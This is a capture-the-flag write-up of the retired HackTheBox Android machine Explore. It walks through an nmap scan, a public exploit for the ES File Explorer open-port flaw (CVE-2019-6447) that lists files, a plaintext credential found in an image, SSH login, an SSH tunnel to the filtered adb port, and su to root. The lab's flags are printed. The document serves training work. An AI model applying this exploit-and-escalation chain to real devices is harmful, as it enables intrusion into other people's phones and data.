HTB: Exlore

Explore card

This is a writeup about a retired HacktheBox machine: Explorer created by bertolis and publish on June 26, 2021. This box is classified as an easy machine. The user part involves an Android exploit for ES File Explorer and the root part a simple port forward and an adb shell.

User

Reco

We start with an nmap scan. Only ports 22 (SSH) and 8080 (HTTP) are open.

# Nmap 7.91 scan initiated Sat Jul 10 02:07:06 2021 as: nmap -sSV -A -p- -oN notes.md 10.129.153.142
Nmap scan report for 10.129.153.142
Host is up (0.012s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
33427/tcp open     unknown
<SNIP>
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<SNIP>

The nmap scan hint us that the "box" is an Android device (port 5555 for adb, Banana ssh server and ES File Explorer).

A quick google search "ES File Explorer exploit" allows us to find an arbitrary file read exploit.

We run it and are able to list the files on the Android phone but nothing there will give us a shell (we are still abe to get the user flag). We list the pictures and found the creds.png file.

└─$ python3 50070.py listPics 10.129.153.142

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

The file is a picture of (beautifully) handwritten credential: kristi:Kr1sT!5h@Rp3xPl0r3!

We can use this credentials to connect using SSH and get the user flag.

└─$ ssh kristi@10.129.153.142 -p2222 #Kr1sT!5h@Rp3xPl0r3!
Password authentication
Password:
Password authentication
Password:
Password authentication
Password:
kristi@10.129.153.142's password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ cat /sdcard/user.txt
f32017174c7c7e8f50c6da52891ae250

Root

We saw in out initial port scan that the port 5555 (adb) was filtered. We use SSH to access the port directly from the device by creating an SSH Local forward tunnel.

└─$ ssh -L 5557:127.0.0.1:5555 kristi@10.129.43.55 -p2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76)

In another terminal we can run adb to list the device, connect to the box, run a shell as root and grab the flag.

└─$ adb devices
List of devices attached
127.0.0.1:5557  device
└─$ adb connect 127.0.0.1:5557
already connected to 127.0.0.1:5557
└─$ adb -s 127.0.0.1:5557 shell                                                                                                                                                                                                          1 ⨯
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # find / -name 'root.txt' 2> /dev/null
/data/root.txt
1|:/ # cat data/root.txt
f04fc82b6d49b41c9b08982be59338c5

Wrapping up

A "quick" and easy box. I spent way to much time on the root part as my adb demon was acting weirdly and I thought the issue was on my port forwarding.